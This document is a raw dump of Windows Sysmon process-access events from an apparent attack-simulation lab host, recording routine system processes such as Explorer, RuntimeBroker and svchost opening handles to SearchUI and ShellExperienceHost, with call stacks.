12:09:51.235{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.235{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.235{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.204{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:51.189{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 